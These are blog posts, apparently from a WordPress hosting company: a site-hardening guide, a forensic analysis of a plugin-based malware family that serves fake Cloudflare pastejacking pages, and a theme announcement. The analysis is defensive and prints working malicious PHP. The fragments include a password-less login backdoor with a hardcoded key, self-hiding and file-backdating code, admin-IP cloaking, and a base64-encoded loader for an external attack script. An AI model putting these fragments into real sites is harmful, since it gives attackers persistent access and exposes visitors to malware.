Many people don’t know what permissions they grant to browser extensions because they’re not careful, they quickly skip through installation.

If you read carefully, you’ll be scared, many extensions can read absolutely all page content, even the passwords you enter or card details when you buy something from a site.

A malicious extension, even if it seems harmless (e.g., a file converter or a video downloader), can steal session cookies, inject ads, or even modify your passwords in the background.

Only install extensions from official stores (Chrome Web Store, Firefox Add-ons). Before installing, check the developer’s name, read reviews, and look at the number of users. Perform periodic cleaning and uninstall extensions you no longer use.

Avoid public Wi-Fi networks

Don’t log into your site’s admin panel when connected to a public, unencrypted Wi-Fi network.

Wi-Fi networks in cafes, airports, or hotels are insecure by nature. An attacker connected to the same network can intercept unencrypted traffic using “Man-in-the-Middle” techniques.

Even if the site uses HTTPS, there are risks of being redirected to fake pages or having your data compromised. A much safer alternative is to use a hotspot from your mobile phone.

Don’t use public devices

Avoid accessing the site from public computers or other people’s devices.

You have no control over the software installed on a computer in a library, hotel, or internet cafe. These can have hardware or software keyloggers that record absolutely everything you do.

Even a friend’s computer can be infected without them knowing.

If you’re in an absolute emergency situation, use a private browsing window (Incognito), make sure you log out correctly, and most importantly, change your password as soon as you get to a trusted device.

Use caution online

Be extremely cautious of suspicious links and email attachments. Avoid free social media offers that may contain malicious scripts.

This is the entry point for phishing and social engineering attacks. An email that appears to be from a bank or social network can trick you into entering your data on a fake login page. A fun quiz on Facebook can request permissions that give it access to your personal data or can run scripts that compromise your browser.

Hover over links in emails to check actual destinations. Never download executable attachments from untrusted sources. Treat urgent messages with suspicion.

Always log out

When you’ve finished working, use the Log Out button.

Just closing the browser tab doesn’t invalidate the session cookie. The session cookie is a small file stored on your computer that tells the WordPress site you’re authenticated. This cookie remains valid for a period of time, even if you close the browser window.

If malware infects your computer during this interval, it can steal the cookie and use it to access your site. The Log Out action sends a signal to the server to immediately invalidate that cookie, making it useless.

Form this habit. Think of the “Log Out” button as locking your house door when you leave. It’s a simple, quick gesture that adds an essential layer of protection.

Conclusion

Start implementing these recommendations today to safeguard your WordPress site and protect all your users.

These rules apply to all users who have access to the site, regardless of access level. A compromised author account can become an entry point for an attacker, especially if there’s a privilege escalation vulnerability on the site.

If a user’s session cookies are stolen and the site has a WordPress plugin installed with a vulnerability that allows privilege escalation, then it’s possible for the attacker to obtain administrator privileges through that user, even if that user wasn’t an admin.

After ensuring your device is clean, the next step is to protect access to the site.

Step 2 - Secure access to the WordPress admin

The next step in protecting your WordPress website is to secure admin access by managing users and permissions, enforcing strong passwords, and restricting access.

The recommendations would be the following:

Use unique usernames

Never use generic usernames like “admin” or ”administrator”. For example, I use obscure footballer names from Pro Evolution Soccer, like Momo Bojang and Afimico Pululu.

Brute-force attacks often try “admin” as the first attempt, and forcing attackers to guess your username raises the difficulty.

If your site already has an “admin” account, the correct and safe procedure is as follows:

Create a new user account with Administrator role and a unique name (momo_bojang, afimico_pululu, etc.)
Log out of the “admin” account
Log in with the new administrator account
Go to the “Users” section and delete the old “admin” account

Warning: WordPress will prompt you to decide what to do with content created by the “admin” user. Choose the option “Attribute all content to:” and select your new account.

This way, you won’t lose any articles or pages.

Pro tip: You can have a user with administrator privileges, which you use only for administrative operations on the site. For content published on the site, consider having a user with only author privileges.

Use complex passwords

Use passwords of at least 12-16 characters, combining uppercase letters, lowercase letters, numbers, and symbols. A password manager (integrated in the browser or a dedicated application) is your best friend.

Length is often more important than complexity. A password like password123! can be cracked in a few seconds. A password like MyDogEatsGreenBiscuits! is a “passphrase” that, although easy for you to remember, would require many years to be cracked by a computer through brute force.

Ideally, combine length with complexity. Using a password manager (e.g., Bitwarden, 1Password, Proton Pass, or those integrated into modern browsers) completely eliminates the headache.

These tools do three essential things:

Generate extremely complex and long passwords (ex: g7#kP$zV9@rT!nE*)
Save these passwords in an encrypted digital vault.
Automatically fill in login details, so you never have to memorise them.

This also prevents password reuse, one of the biggest security mistakes.

Make a periodic audit

Regularly check the user list and delete inactive or suspicious accounts.

Ensure each user has the role with the minimum privileges necessary for their activity. Each user account is a potential “door” into your site. Old, forgotten accounts of former employees or collaborators represent a major security risk.

If the password associated with such an account is weak or if the email address was compromised elsewhere, the account can be taken over and used to attack the site.

Apply the “Principle of least privilege”.

Set a calendar alert once every three months to do the following check: Go to Users -> All Users. Review the list and delete any accounts that are no longer needed. For the remaining accounts, analyse each one’s role. An author only needs the Author role. Someone editing others’ content needs the Editor role.

Grant the Administrator role only to those who absolutely need to install plugins and themes and modify the site’s basic settings.

Changing the login address to a custom one can significantly reduce the number of automated brute-force attacks.

The address yoursite.com/wp-login.php is the universal standard for WordPress, known to all attackers and bots.

They constantly attempt to access this address, consuming your server resources and attempting to guess passwords. By changing this address, bots will encounter a non-existent page (“404 Not Found”), and their attack will be halted before it begins.

Changing the login address is similar to moving your front door to a secret location. A dedicated plugin can make this easy. Try a lightweight plugin like WPS Hide Login, which specialises in this one task and does it exceptionally well.

After activation, go to Settings -> General and scroll to the bottom of the page. You’ll find a new option called “Login URL”. Enter something unique and memorable for you (like access-panel, secret-entrance, portal). Save the changes.

Implement 2FA - Two-factor authentication

Even if your admin password is stolen, 2FA adds a second layer of protection (a code generated by an app on your phone), blocking unauthorised access. Enable 2FA for all administrator accounts and, whenever possible, all users with sensitive roles.

A simple WordPress plugin that does just this is Two-Factor. Another plugin that offers more options but remains focused on securing authentication is Fluent Auth.

Protect against brute-force attacks

You can limit the number of failed login attempts to block automated attacks.

A “brute-force” attack is exactly what the name suggests: a software robot tries thousands or millions of password combinations per second, hoping to hit the correct one. Without a protection measure, this process can continue indefinitely.

Besides the obvious security risk, these attacks consume enormous processing resources (CPU) on the server, which can lead to slowdowns or even block legitimate visitors from accessing your site.

A login attempt limiting plugin works like a guard. After a preset number of incorrect attempts (e.g., 3 or 5) from a specific IP address, the plugin temporarily blocks that IP address for a specified period (e.g., 30 minutes or longer).

WordPress plugins that can help:

Monitor website activity

It’s essential to know what’s happening on your website.

Think of an activity log as your site’s surveillance camera system and a “black box.”

While it does not directly prevent incidents, an activity log is essential for understanding what happened after an event, whether it is a security attack, human error, or a technical issue. Without this log, investigating a problem is like searching for a needle in a haystack while blindfolded.

The Stream plugin, for example, should be essential on any site accessed by multiple people. It chronologically records critical actions such as:

If a new user with the administrator role was created
Who logged in and when
What plugin was activated or deactivated and by whom
What article was deleted, and by whom

You can configure email alerts for the most critical events in the plugin. You can get an instant notification whenever an administrator logs in or when a plugin is installed. This can provide the warning you need to react quickly in case of unauthorised activity.

Use session control

For advanced control, actively manage user sessions to ensure strict security.

A “session” represents each active login to your site. You can be simultaneously logged in from your office computer, home laptop, and phone. Each of these is a distinct session, validated by a cookie. If any of these cookies is stolen, the attacker can use that session to access the system.

Session control provides visibility and control over active connections. Using a plugin like Sessions (from the PerfOps One suite), you gain direct control: you can see in real-time who is logged in, from what IP address, and for how long.

A simultaneous login from your city and China for the same user is a clear alarm signal. If you notice a suspicious login session, you can close it instantly with a single click. This action invalidates that cookie and logs out the attacker.

You can set a rule preventing a user from having more than one active session. When they log in from a new device, the old session is automatically closed. This simple measure drastically reduces the attack surface, eliminating the risk of “forgotten” cookies on various devices.

Restricting access through IP

If you’re the only person administering the site, you can block everyone’s access to wp-admin and wp-login.php except your IP address.

In this case, even if your password is cracked or your session cookies are stolen, the attacker can’t log into the site. If you have a dynamic IP address, this method may not be practical, as your IP address can change frequently, potentially locking you out of your own site. Consider using alternative methods for access restriction that accommodate dynamic IPs, such as VPNs with a static IP or IP whitelist services.

The blocking can be done from the .htaccess file. You add the following code (replace YOUR_IP_ADDRESS with your IP address, which you can find by accessing our tools site from your device):

order deny, allow
deny from all;
allow from YOUR_IP_ADDRESS

Good, we’ve addressed the main cause of infections so far, which is authentication compromise (stolen session cookies + compromised credentials).

Let’s continue addressing the second cause, exploiting vulnerabilities in plugins and themes.

Step 3 - Constant maintenance (updating and cleaning)

Once access to the WordPress admin interface is secured, we need to ensure that the site’s software has no security vulnerabilities or “cracks.”

Update everything, always

The lifecycle of a vulnerability is a race against time. Once a security issue is discovered and a patch is released, details about the vulnerability often become public. Hackers then start scanning thousands of sites to find those still running the old, unpatched version.

For most small sites that use only a handful of carefully selected plugins and a high-quality theme, enabling automatic updates works well.

WordPress allows automatic updates for minor core versions. You can also enable automatic updates for WordPress plugins and themes directly from the admin panel or through the WordPress management tools integrated into your hosting provider’s control panel.

Automated updates reduce the need for manual intervention; however, we recommend setting up an uptime monitoring service to ensure you’re notified if an update causes an issue.

For more critical sites, manual control over how and when updates are made is preferable.

Use a staging environment

A staging environment is a vital tool for testing and development purposes.

It’s a clone of your live site where you can safely test major updates, new plugins, or code modifications. If something breaks on staging, it has no impact on your visitors. Performing updates directly on a live site, especially one that generates revenue, is an unnecessary risk, so make sure you use the staging platform offered by your hosting provider.

It’s easy to create a clone of your website on Kiravo (follow this tutorial), allowing you to make updates safely without affecting the live site. If everything works without problems, you can apply the updates in production.

If your hosting provider does not offer built-in staging options, a plugin like WP Staging can be an effective solution; however, it may add some bloat to your website.

Make backups before any changes

A good practice for updates or modifications to the code or database is to make a backup beforehand.

An update can fail due to incompatibility with another site component, leading to critical errors (such as a “white screen of death”). Without a recent backup, recovery can be stressful, costly, and lengthy. With a backup, you can return to the functional version of your site in a few minutes.

At Kiravo, we offer automatic daily backups and the ability to create manual backups directly from the control panel. Both automatic and manual backup options are available across all our hosting plans.

Delete what you don’t use

A frequently overlooked aspect is removing unused plugins and themes.

It’s essential to understand the difference between “inactive” and “deleted”. An inactive plugin or theme is like an installed but not running program. Its physical code still exists on your server. If that code has a vulnerability (for example, a script that can be accessed directly through a specific URL address), an attacker can exploit it regardless of whether the plugin is activated or not.

Each software element you keep adds to your site’s “attack surface”; more code means more potential entry doors. Ask yourself: “Is this plugin/theme absolutely essential for my site’s functioning NOW?”.

If the answer is no, first deactivate the element. Then, navigate the site to make sure everything works correctly. If everything is fine, come back and delete it permanently.

Give up the “I might need it sometime” mentality. If you need it again, you can reinstall it in 30 seconds. The security risk of keeping unused code far outweighs the minor inconvenience of a future reinstallation. The golden rule is: if you don’t use it, delete it!

This applies not only to themes or plugins, but also to entire sites – don’t leave old sites, test sites, clones, outdated stagings, or anything else you don’t actively use on the server, especially if you have a classic cPanel hosting plan, where there is no isolation between sites.

Monitor errors

Another important aspect is monitoring error logs after updates have been applied.

Sometimes, an update doesn’t crash the site but introduces “silent” PHP errors running in the background. These errors can slow down the site’s performance, cause abnormal functionalities, and fill up server space with log files of tens of gigabytes. Checking the error log is like a medical checkup after an intervention.

After performing updates, access the file manager from the hosting panel and locate a file named error_log (typically in the site’s root directory). Open it and look at the latest entries.

These can alert you to any problems that have occurred and help you resolve them.

Watch out for shared hosting!

On a cPanel account, sites are not isolated from each other.

A vulnerable or infected site can compromise all other sites in the same account. Ensure that all sites you manage are equally well-secured.

Pro tip: Don’t host sites of friends, family, or any other site you don’t control on your cPanel account. If any of them have security problems, vulnerabilities, or infections, it can affect all your sites.

Sites on the Kiravo hosting platform are isolated from each other, so an infected site cannot infect another site.

By keeping all PHP scripts up to date on all sites, you’ll significantly reduce the risk of your site becoming a victim of software vulnerability-based attacks.

Block malicious traffic before it reaches the server

A reverse proxy service, such as Cloudflare, acts as an intelligent shield placed in front of your server, which filters malicious traffic before it reaches your site. The most popular services offering filtering and protection solutions are:

Traffic passes through their global network, where it can be filtered based on IP, country, request type, suspicious behaviour, presence of bots, or traffic intensity.

I’ve been using Cloudflare’s free plan for my websites for a long time, and it has been sufficient to provide adequate protection.

What you can do from Cloudflare to secure your WordPress site:

You can block traffic from high-risk regions (e.g., China, Russia, etc.)
You have free, automatic, and unlimited DDoS protection
You have protection against bots scanning the site
You can protect contact forms with Cloudflare Turnstile
You can block or limit access to PHP files that are frequently attacked (e.g., xmlrpc.php)

Bonus – The right hosting partner

This is where the major difference lies between cheap hosting and premium hosting specialised in WordPress.

Quality hosting will offer server-level WAF, real-time anti-malware scanning, and IP blocking as standard. Even a cheap one offers those benefits.

But a premium hosting like Kiravo will go further:

site isolation – each site runs in its own isolated container. On the same hosting package, you can have sites on different servers, in different locations.
auto-repair for WordPress core – modified or infected WordPress core files are automatically replaced with clean versions.
login protection through a captcha solution + limiting failed login attempts and blocking automatic logout from admin after 60 minutes of inactivity
security headers – prevent vulnerability exploitation, protecting against Cross-Site Scripting (XSS), clickjacking, and other threats.
uptime monitoring – hosting providers typically only monitor their servers, not clients’ sites. Kiravo also monitors sites to enable quick intervention during downtime (caused by infections or other issues).
proactive expert support - it’s easy to throw an AI chatbot to answer basic questions, but in case of a complex malware attack, you need experts on your side.

These benefits are near impossible to obtain on cheap cPanel hosting.

Myths and realities about WordPress security

Many “tips” you see online are either outdated or completely useless. Let’s review a few frequently found in superficial and poorly documented articles, which either bring no real benefit or induce a false sense of security.

Myth: WordPress is insecure

Reality: WordPress core is very secure.

According to the Patchstack report for 2024, 0.2% of vulnerabilities were found in WordPress core. In the 2025 report, the figure dropped to 0.001%—only 7 vulnerabilities. Risk comes almost exclusively from poor quality, outdated themes/plugins, or wrong usage practices.

Myth: You need an “all-in-one” security plugin

Reality: these monolith plugins can offer a false sense of security.

Intelligent malware can easily fool a local scan, and some of these plugins have had serious vulnerabilities themselves. Moreover, they consume significant resources. It’s more efficient to use small, specialised plugins (for 2FA and login limiting) and leave scanning and firewall protection to the hosting provider and an external service, such as Cloudflare.

Myth: My site is small, so nobody attacks me

Reality: the vast majority of attacks are automated.

While a more well-known site has a higher chance of being attacked, bots constantly scan the internet looking for vulnerabilities, not just famous sites. Your site is just an IP on a list.

Myth: HTTPS secures my site

Reality: partially true.

HTTPS encrypts data in transit, protecting information sent through forms. It doesn’t protect the site from malware, SQL injections, or software vulnerabilities. It’s a necessary but small piece of the security puzzle.

Myth: I have good hosting, so I don’t need to worry

Reality: partially true.

Ordinary hosting, no matter how good, provides a solid foundation, but it cannot secure your site’s code, weak passwords, or vulnerable plugins you install. It’s a trustworthy partner, but doesn’t do all the work for you.

Myth: I changed the database prefix, so I’m ok

Reality: a completely useless measure in practice.

The default prefix for database tables is wp_. You’ve probably seen recommendations to change it to something custom. It’s one of the most useless suggestions. Database security doesn’t lie in a weird prefix. Don’t waste your time with that; it has no relevance.

Myth: Hide WordPress version

Reality: Irrelevant.

Bots will try to exploit all known vulnerabilities, regardless of the version you report in the site’s header.

Conclusion

Securing a WordPress site is not something you do just once; it is an ongoing process that requires regular attention and care.

By employing a layered approach that incorporates good digital habits, robust access controls, regular updates, an external firewall, and high-quality hosting, you can reduce risks and establish a rock-solid foundation for your online presence.

Do you have questions or need help securing your WordPress site?

Feel free to contact us. We offer security audits and malware removal services at affordable rates. If you’re a Kiravo customer, our support includes malware removal at no additional charge.

Inside the fake-Cloudflare-verification malware

Andrei Chira — Sat, 06 Sep 2025 00:00:00 GMT

This article presents a detailed technical autopsy of a sophisticated malware campaign targeting WordPress websites, designed to trick visitors into compromising their own computers.

The attack culminates in a fake “Cloudflare Verification” page that uses social engineering to convince victims to run malicious commands in their terminal.

If you’ve encountered a page like the one above while browsing the web, it’s crucial to understand what you are seeing. This is not a legitimate security check from Cloudflare or any other security provider. It is a sophisticated trap designed to compromise your personal computer.

The short answer: It’s a trap!

If this page appears, your next actions are critical for your security.

Do NOT follow the on-screen instructions.
Do NOT copy or paste anything into your Terminal or PowerShell.
Close the browser tab immediately.

The page is a scam. The issue is not with your connection’s security; the website you are visiting has been compromised by malware.

How the scam works (a simple explanation)

The attacker is using a technique known as “pastejacking” (a form of clipboard hijacking). The goal is to trick you into running a malicious command on your own computer.

Think of it like a magic trick for your clipboard.

The Bait: The page shows you a harmless line of text, such as 'I am not a robot: Cloudflare Verification ID: 715921'.
The Switch: However, when you click the “Copy” button, a hidden script copies a different, malicious command to your clipboard.
The Trap: The attacker relies on you trusting the text you saw and pasting the hidden command into your computer’s terminal without verifying it first. Once you press Return, that malicious command runs, potentially installing malware, ransomware, or keyloggers on your system.

Who is at risk?

This specific attack is designed to target users of desktop operating systems like macOS and Windows. The instructions to open “Terminal” (for Mac) or “PowerShell” (for Windows) are the key indicators.

Users on mobile devices like phones and tablets are generally not targeted by this specific method, as they do not have the same command-line interfaces.

For site owners & developers — the technical deep dive

The investigation began after our proactive, server-side security systems detected and neutralized malicious code on several client accounts.

This automated action, while successful in disabling the threat’s core functions, resulted in PHP Fatal Errors on the affected sites. These errors, combined with client reports of a strange “cloaking” behavior, where the site appeared broken to the public but worked perfectly for logged-in admins, prompted a full forensic analysis.

Our investigation uncovered a complex WordPress malware family that disguises itself as plugins with procedurally generated names. We have identified several variants, including:

Plugin “Pouros, Bechtelar and Treutel,” internally identified by the text-domain emotional-haversack.
Plugin “Schowalter, Corkery and Krajcik,” identified by the text-domain forceful-premise.

It is highly probable that other variants exist, and we will update this article as new information becomes available.

A peculiar plugin

The plugin’s header immediately raised suspicion. It was a collection of nonsensical, procedurally generated data designed to mimic a legitimate plugin while revealing nothing of its true purpose.

/**
 * Plugin Name: Pouros, Bechtelar and Treutel
 * Description: Venustas apto umerus amoveo defaeco velum...
 * Version: 3.17.8
 * Text Domain: emotional-haversack
 * Author: Jerald Bernier MD
 */

The combination of a random corporate name, a Latin placeholder description, a fake author, and the bizarre emotional-haversack text domain served as the first indicator that this was no ordinary plugin.

A critical breakthrough in this investigation was the discovery of a second, seemingly different plugin named forceful_premise on another compromised site.

While its generated details were unique, its internal structure was identical. This confirmed that we were not dealing with a single piece of malware, but an entire family generated by the same malicious toolkit.

The malware’s DNA: what stays the same

Core Logic & File Structure: The operational flow (loader, includes, hooks, and core functions) remains identical across variants. The directory structure (/class, /vendor, /includes, etc.) is also preserved.
Obfuscation Strategy: The technique of using generative “noise” functions, nonsensical names, and decoy asset files is the malware’s consistent signature.

The procedural disguise: what changes

All Identifiers: The plugin name, folder name, author, URIs, and internal function/variable names are unique to each variant.
The Text Domain: Our analysis confirmed that even the Text Domain is procedurally generated (e.g., emotional-haversack in the first case, forceful-premise in the second). This is a key finding, as it invalidates using a single text domain as a reliable, unique indicator for detection.

Indicators of compromise (IoCs)

Administrators and security professionals should search for the following patterns and indicators to identify this threat:

Plugin Directory: A randomly named directory in wp-content/plugins/ (e.g., emotional_haversack, forceful_premise).
Plugin Header: Search all plugin files for headers containing a Latin placeholder Description.
Backdoor URL Parameters: Check server access logs for requests containing the GET parameters harp_interesting or terrorise_seriously.
External Network Requests: Monitor outgoing traffic from your site’s frontend for requests to domains like javascriptbasics.com.
File System Artifacts: The presence of a license.txt file within the plugin’s subdirectories.

Infection vector - a compromised administrator account

While many infections exploit software vulnerabilities, the server logs for this case revealed a more direct and alarmingly common point of failure: compromised administrator credentials.

The attacker did not need to find a complex flaw in a plugin; they simply walked in the front door with a stolen key.

Anatomy of the breach via server logs

The access logs paint a clear, minute-by-minute picture of the breach:

1. The Login: [03/Sep/2025:10:59:39]

140.235.170.168 - - [03/Sep/2025:10:59:39 +0300] "POST /wp-login.php HTTP/2" 302 ...

The attack begins with a POST request to wp-login.php from the attacker’s IP (140.235.170.168). The 302 status code indicates a successful redirect, the standard result of a correct username and password submission. At this moment, the attacker gained full administrative access to the site.

2. The Upload: [03/Sep/2025:11:00:22]

140.235.170.168 - - [03/Sep/2025:11:00:22 +0300] "POST /wp-admin/update.php?action=upload-plugin HTTP/2" 200 ...

Less than a minute after logging in, the attacker navigated to the plugin installation area and used WordPress’s legitimate functionality to upload their malware, packaged as a ZIP file. This log entry shows the direct POST request to the plugin upload handler.

3. The Activation: [03/Sep/2025:11:00:33]

140.235.170.168 - - [03/Sep/2025:11:00:33 +0300] "GET /wp-admin/plugins.php?action=activate&plugin=emotional_haversack%2Femotional_haversack.php..."

Just 11 seconds later, the attacker activated the plugin. This single GET request triggered the entire malicious activation sequence.

This log analysis is critical because it demonstrates that the initial vulnerability was not in a piece of software, but in account security.

This underscores the paramount importance of strong, unique passwords and Two-Factor Authentication (2FA) as a primary line of defense.

The attack chain: a phase-by-phase autopsy

The malware implements a multi-layered strategy for infection, persistence, and evasion. The key attack vectors include:

A password-less authentication backdoor for persistent access.
Advanced hiding mechanisms in both the backend (the plugins list) and the frontend (IP-based cloaking for administrators).
An installation routine that modifies file timestamps to evade detection.
An extensive use of “noise” code and decoy files to frustrate analysis.

All of these sophisticated server-side mechanisms are designed with a single purpose: to successfully execute the final phase of the attack. This final phase is the delivery of a malicious JavaScript payload, which is responsible for hijacking the visitor’s browser and displaying the fake Cloudflare verification page.

The malware’s architecture is modular and deliberately fragmented. The attack unfolds in four distinct phases.

Phase 1: Activation & Entrenchment (The Setup)

Upon activation, the malware immediately executes a sophisticated setup routine designed not just to function, but to disappear.

Temporal camouflage

function obnoxiously_unnecessarily($path)
{
    $main = vacantly_chunder_selfish(dirname(neck_afterwards));

    if (is_dir($path)) {
        touch($path, $main);
        $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($path, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::CHILD_FIRST);
        foreach ($files as $fileinfo) {
            touch($fileinfo->getRealPath(), $main);
        }
    } else {
        touch($path, $main);
    }
}

The first and most clever setup function is designed to make the malware “age” itself instantly.

It scans the wp-content/plugins/ directory, finds the modification timestamp of the oldest legitimate plugin, and then recursively changes the “last modified” date of all its own files and folders to match this old timestamp.

This is a brilliant anti-detection technique. An admin inspecting the file system would normally spot a new plugin by its recent date. By backdating itself, the malware’s folder blends in, appearing as if it has been installed for months or years.

The state flag & cache purge

function fold_league_dutiful()
{
    $p = __DIR__ . "/" . "license.txt";
    file_put_contents($p, "e2075474294983e013ee4dd2201c7a73=1");
    if (wp_using_ext_object_cache()) {
        wp_cache_flush();
    }
    chairperson_nervously_not();
}

The second activation function handles state management and prepares for payload delivery.

It creates a license.txt file to act as an “active” flag. It then calls a master cache-purging function that aggressively clears the caches of WordPress’s native object cache and major plugins like WP Rocket, W3 Total Cache, and WP Fastest Cache. to ensure the malicious payload is delivered to the very next visitor.

Phase 2: persistence & evasion (the core backdoor)

With the malware entrenched, its next priority is ensuring long-term, undetected access.

The authentication backdoor

function inventory_tenant_innovate_wildly()
{
    if (isset($_GET['harp_interesting']) && isset($_GET['terrorise_seriously'])) {
        $temp = intval($_GET['harp_interesting']);

        if ($_GET['terrorise_seriously'] !== "2MMatYMDsDr4yMlFmKx3pB5G9iBVTsU0NwOwTE78ShvqQ4Ui") {
            exit;
        }
        wp_set_auth_cookie($temp);
        wp_redirect("/wp-admin");
        exit;
    }
}

add_action('init', 'inventory_tenant_innovate_wildly');

This provides the attacker with a permanent, password-less “skeleton key” to the website.

Hooked to the init action (running on every page load), this function listens for a user ID and a hardcoded secret key GET parameters in the URL. If the correct key is provided, it calls wp_set_auth_cookie() and logs the attacker in as that user without a password.

Backend invisibility

function extent_sanity_svelte_fray($plugins)
{
    $temp = "emotional_haversack/emotional_haversack.php";

    if (isset($plugins[$temp])) {
        unset($plugins[$temp]);
    }

    return $plugins;
}

To avoid detection, the plugin renders itself invisible within the WordPress dashboard.

The function hooks into the all_plugins filter, intercepts the list of plugins before display and removes itself from the list of plugins displayed in the admin dashboard.

Now, the plugin is fully active but does not appear in the list of installed plugins, making it a “ghost.”

Phase 3: reconnaissance & cloaking (the stealth engine)

This is the malware’s most sophisticated feature, allowing it to hide the payload from site owners.

Harvesting admin IPs

function amendment_majestically_neck() {
    global $wpdb;
    
    $results = $wpdb->get_results("
        SELECT um.meta_value as session_data
        FROM {$wpdb->usermeta} um
        INNER JOIN {$wpdb->usermeta} um2 ON um.user_id = um2.user_id
        WHERE um.meta_key = 'session_tokens'
        AND um2.meta_key = 'wp_capabilities'
        AND (um2.meta_value LIKE '%administrator%' OR um2.meta_value LIKE '%editor%')
        AND um.meta_value != ''
    ");
    
    return array_unique($temp);
}

Before delivering its payload, the malware needs to know who to hide from.

Through a direct SQL query, the function identifies all administrator and editor users and extracts the IP addresses from their active session_tokens.

The list of IP addresses is then cached for five minutes using the Transients API.

The cloaking decision engine

function vanish_commodity_closely() {
    $main = babushka_frightfully();
    $temp = cripple_platypus();
    
    return in_array($main, $temp);
}

This function is the core of the cloaking mechanism. It compares a visitor’s current IP against the cached list of admin IPs, returning true if the visitor is an admin.

This prevents the payload delivery script from being shown if the visitor is an admin.

Phase 4: payload delivery (the final strike)

The culmination of all these efforts is the delivery of the malicious payload to unsuspecting visitors.

The gatekeeper

function deliberately_noteworthy_digitize()
{
    $temp = 'aHR0cHM6Ly9qYXZhc2NyaXB0YmFzaWNzLmNvbS9xTDQ3SzYwbFA1Y1ZVa3R5R2Z3cDFYYm51MEJIYU9jVkw3MGtpRDFLYmJE';
    wp_register_script('suddenly_really_list', base64_decode($temp), array(), null, false);
    wp_enqueue_script('suddenly_really_list');
}

Hooked to wp_enqueue_scripts, this function acts as the final gatekeeper.

The script is only injected if all cloaking conditions are met (the visitor is not an admin, not on a login page, not using the backdoor URL, and their IP is not on the admin list).

The malicious payload

If a visitor passes all checks, the final payload is executed. A Base64 string is decoded to reveal an external JavaScript URL (https://javascriptbasics.com/[...]), which is then injected into the page via wp_enqueue_script.

This script is responsible for the final pastejacking attack, displaying the fake Cloudflare verification page with the message Ususual Web Traffic Detected and the request to verify that you are a legitimate user.

The art of misdirection

Beyond its core functions, the malware is a masterclass in misdirection.

Generative gibberish: Every file, function, and variable name is a nonsensical combination of words, making the code unreadable.
The decoy arsenal: The plugin directory is populated with non-functional .js files (containing fatal syntax errors), .json and .css files (with duplicated, nonsensical code), and simple .png images. Their sole purpose is to act as “set dressing,” making the plugin’s structure appear legitimate.

Full remediation & hardening protocol

Identifying and removing this threat requires a methodical approach.

Step 1: Identification

Due to the polymorphic nature of this malware, do not rely on a single filename. Search for the patterns and IoCs listed above, especially a plugin with a random name and a Latin description.

PHP errors referencing a missing include, function not found or invalid function name from a strange plugin is often the first symptom.

If your hosting provider has a malware scanner, it will probably detect and clean the infection, leading to errors like "The white screen of death" or "There's been a critical error on your website."

Step 2: Full removal

Delete the plugin directory: Manually delete the entire plugin directory (e.g., emotional_haversack/, forceful_premise/) via FTP or SSH.
Inspect for persistence: Check wp-config.php, .htaccess, and wp-content/uploads/ for any suspicious files or modifications.
Verify user accounts: Audit all administrator accounts in the database.

Step 3: Post-hack security measures

Reset all secrets: Immediately reset all WordPress admin passwords, database passwords, FTP/SFTP passwords, and hosting passwords.
Force logout all users: Invalidate all current login sessions.
Update everything: Ensure WordPress core, themes, and all remaining plugins are on their latest versions.

Step 4: Long-term prevention

Never use pirated (“nulled”) premium themes and plugins. Purchase legitimate licenses to support developers and ensure your site’s security.
Perform regular audits: Use a trusted security plugin to perform regular file integrity scans and malware checks.
Maintain proper digital hygiene. Install an antivirus or antimalware program on your computer, keep your OS and browser updated, don’t use browser extensions from untrusted sources, avoid free public Wi-Fi, etc.

We will publish a more in-depth security guide for site owners, so follow Kiravo on social media (LinkedIn, Facebook, X, YouTube) to keep up with our updates.

Conclusion

This case highlights the importance of a defense-in-depth security strategy.

Automated server-side security, like that deployed on the Kiravo hosting platform, provides an essential first line of defense, capable of detecting and neutralizing threats in real time.

While disruptive, the fatal errors triggered by our system’s intervention ultimately were a positive signal that the malicious code had been stopped.

However, complete security is a shared responsibility. By combining proactive hosting security with responsible user practices, we can create a much safer and more resilient environment for everyone in the WordPress ecosystem.

Introducing the Simplenet WordPress block theme

Elena Chira — Mon, 27 Jan 2025 00:00:00 GMT

We are starting 2025 with a significant achievement: our first WordPress theme, Simplenet, has been accepted into the official WordPress.org repository!

This accomplishment holds special meaning for me, considering that I am not a programmer, and the process of creating a theme from scratch has been a true learning adventure.

I’ve been working with WordPress since around 2008-2009. Over the years, the platform has evolved tremendously, and with the introduction of the Gutenberg project in 2017, I had to relearn WordPress.

I began exploring and learning all the new features introduced in Gutenberg related to blocks, block themes, block patterns, and configuring WordPress themes through theme.json.

The Simplenet theme is the result of this learning process. I was inspired by other existing themes and tried to understand how the structure of a block theme works.

What the Simplenet theme offers

Simplenet is a minimalist, fast, and easy-to-customize theme created to fully leverage the power of WordPress blocks. It is perfect for users who want a simple yet elegant website without unnecessary embellishments.

Some of its main features include:

Full compatibility with the WordPress block editor
A clean and responsive design suitable for various types of websites
18 color styles based on Tailwind CSS
Dark mode compatibility

Block theme

The theme is a block theme, a new type of WordPress theme introduced with the Full Site Editing (FSE) editor. These are built around the concept of blocks, offering users the ability to customize every aspect of the site using the visual interface of the WordPress block editor.

Unlike traditional themes, which rely on PHP files for templates and customization, block themes use a theme.json file to control global styles, such as colors, fonts, and sizes.

Block themes allow editing the entire site directly from the WordPress editor without requiring programming knowledge. Users can modify the header, footer, pages, and other sections of the site in real-time, simply by arranging blocks.

Colors

One feature of the Simplenet theme is the inclusion of 18 color style variations inspired by the well-known palette from Tailwind CSS. These variations are designed to offer users maximum flexibility in customizing the site, regardless of its type or purpose.

You can directly select one of the 18 color variations offered by the theme, and in the future, I plan to add font variations to provide users with a wide range of design combinations.

Dark Mode

All 18 variations are fully compatible with dark mode, offering a modern experience to users who prefer this viewing mode.

To use Dark Mode, you need to install the Dark Mode Toggle Block plugin created by Rich Tabor and add the Dark Mode Toggle block to the header. I will soon create a video tutorial on how to implement Dark Mode.

Future plans for the Simplenet theme

Adding the theme to the official WordPress.org repository is just the beginning of the Simplenet theme. I have big plans for its development to bring more value to WordPress users in general and to our clients in particular.

Here’s what’s next:

YouTube Video Tutorials – I will create a series of videos showing how to create various sections on a site using blocks. For example, I will explain step by step how to build:

Hero sections
Pricing tables
Testimonial sections
etc.

Adding block patterns – After creating these tutorials, I will include the respective sections in the theme as block patterns. These will be ready for anyone who downloads and installs the theme. I will update the theme with each new addition so users can effortlessly benefit from new functionalities.

Adding more font combinations – I plan to include predefined font combinations to offer users more options for customizing the site’s design.

Creating page templates – I will develop predefined templates for pages so that users can set up their site’s structure more quickly. For example, ready-made pages for Home, About Us, Services, etc.

